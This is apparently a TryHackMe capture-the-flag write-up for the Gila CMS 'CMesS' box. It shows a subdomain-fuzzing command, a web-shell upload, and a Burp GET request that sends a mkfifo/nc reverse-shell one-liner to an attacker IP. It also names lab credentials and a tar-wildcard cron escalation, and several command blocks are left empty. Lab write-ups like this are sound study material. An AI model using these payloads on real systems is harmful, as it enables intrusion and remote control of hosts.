THM - CMesS
Can you root this Gila CMS box?
This is a medium rated box, and we already know it runs Gila CMS from the title. Let’s begin.
nmap says we’ve got 22 (SSH) and 80 (HTTP) only; web all the way?
Checking searchsploit before doing much else, we can see there a couple of different authenticated RCE exploits for different versions of Gila, so presumably we’re going to need some creds.
We can do some gobusting/dirbusting and turn up plenty of links, but nothing very fruitful. Checking the Gila documentation doesn’t help much either.
We can use WFUZZ to fuzz for subdomains, so let’s do that:
wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://cmess.thm" -H "Host: FUZZ.cmess.thm" -t 42 --hl 1
Note: this command is NOT optimised - it didn’t filter out bad results. But quickly scanning through it revealed one good result - dev.cmess.thm.
We add dev.cmess.thm to our /etc/hosts and continue
This is a simple page that exists (essentially) purely for the purpose of giving us credentials. Yes, these CTFs are somewhat contrived.
Once we log in and poke around for a bit, we find we can upload a file. I do shell.phtml with the contents:
Once we’ve got that we can send it a reverse shell command with Burp Suite:
GET /tmp/media_thumb/shell.phtml?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.9.10.123+1234+>/tmp/f HTTP/1.1
On the box
We grabbed the credentials for the SQL login earlier when we were poking around in Gila: root:r0otus3rpassw0rd.
We can login to SQL:
And with that we grab andre’s hash:
But to make it even easier we can find the password (UQfsdCB7aAP6) for andre in /opt/.password.bak and then we can su andre.
Linpeas points to a cronjob:
root cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *
This was a new one to me. At first I thought I could replace tar, but cron has it’s own PATH:
And I can’t write to any of these directories. So now what? Well, there are a class of tar exploits that I wasn’t previously aware of. This site provides an explanation and examples. Here’s what I did:
To be honest, I don’t really understand why this works, but it does. More things to learn.